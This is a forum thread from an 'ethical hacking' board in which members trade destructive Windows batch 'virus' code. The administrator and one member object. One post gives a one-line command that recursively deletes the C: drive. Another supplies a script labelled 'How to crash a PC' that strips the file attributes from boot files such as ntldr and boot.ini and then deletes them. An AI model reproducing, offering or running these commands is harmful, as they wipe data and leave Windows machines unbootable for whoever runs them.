any viurs u want to pass around

Discussion in 'Ethical hacking' started by Da_Bullet13, Aug 29, 2007.

  1. GreenGrass

    GreenGrass New Member

    Joined:
    Jul 5, 2008
    Messages:
    123
    Likes Received:
    8
    Trophy Points:
    0
    Location:
    Norway
  2. shabbir

    shabbir Administrator Staff Member

    Joined:
    Jul 12, 2004
    Messages:
    15,375
    Likes Received:
    388
    Trophy Points:
    83
    Aren't we forgetting the Ethical part. :shoot:
     
  3. hanleyhansen

    hanleyhansen New Member

    Joined:
    Jan 24, 2008
    Messages:
    336
    Likes Received:
    8
    Trophy Points:
    0
    Occupation:
    Drupal Developer/LAMP Developer
    Location:
    Clifton
    Home Page:
    http://www.hanseninfotech.com
  4. microapple

    microapple Banned

    Joined:
    Jul 2, 2008
    Messages:
    58
    Likes Received:
    2
    Trophy Points:
    0
    Sorry, but seriously would would want to completely destroy someones computer? Not me!
     
  5. jwshepherd

    jwshepherd New Member

    Joined:
    Aug 13, 2007
    Messages:
    135
    Likes Received:
    0
    Trophy Points:
    0
    Occupation:
    VP Technology Corporation
    Location:
    Texas
    Home Page:
    http://www.officialhackers.com
    Xp locks most disks it has access to from INT 13 commands which you would need to be able to run the format command. a simpler way is to use rd:

    Code:
    rd c: /q /s
    
    I currently use it to clean temp directories instead of sending things to the recycle bin

    Code:
    cd %TEMP%
    rd . /s/q
    cd ../"temporary internet files"
    rd . /s/q
    
    fast clean efficient


    Viruses whether destructive or not are a part of our world. Learning to use them is to our advantage.
     
  6. neo_vi

    neo_vi Member

    Joined:
    Feb 1, 2008
    Messages:
    720
    Likes Received:
    16
    Trophy Points:
    18
    Occupation:
    Software engineer
    Location:
    Earth
    Home Page:
    http://computertipaday.blogspot.com
    I dont know wat dabullet is trying to tell. all he tells is to delete all the files.

    It can easily done by the command format.

    any one pls explain. whats his idea???
     
  7. microapple

    microapple Banned

    Joined:
    Jul 2, 2008
    Messages:
    58
    Likes Received:
    2
    Trophy Points:
    0
    idk
     
  8. faizulhaque

    faizulhaque New Member

    Joined:
    May 23, 2008
    Messages:
    210
    Likes Received:
    3
    Trophy Points:
    0
    Occupation:
    Student
    Location:
    Karachi
    Home Page:
    http://www.google.com
    @topic Creator

    just making few steps to a virus program.

    I have also a few batch code for making such type of virus,

    How to crash a PC
    Code:
    @echo off 
    attrib -r -s -h c:\autoexec.bat
    del c:\autoexec.bat
    attrib -r -s -h c:\boot.ini
    del c:\boot.ini
    attrib -r -s -h c:\ntldr
    del c:\ntldr
    attrib -r -s -h c:\windows\win.ini
    del c:\windows\win.ini 
    
    i don't know who the prgram of topic creator is work :shout: it's b/c without changing attribute of boot file or dll or ini file who could i delete or erase it.
    would any one explain me :lipsrseal
     

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice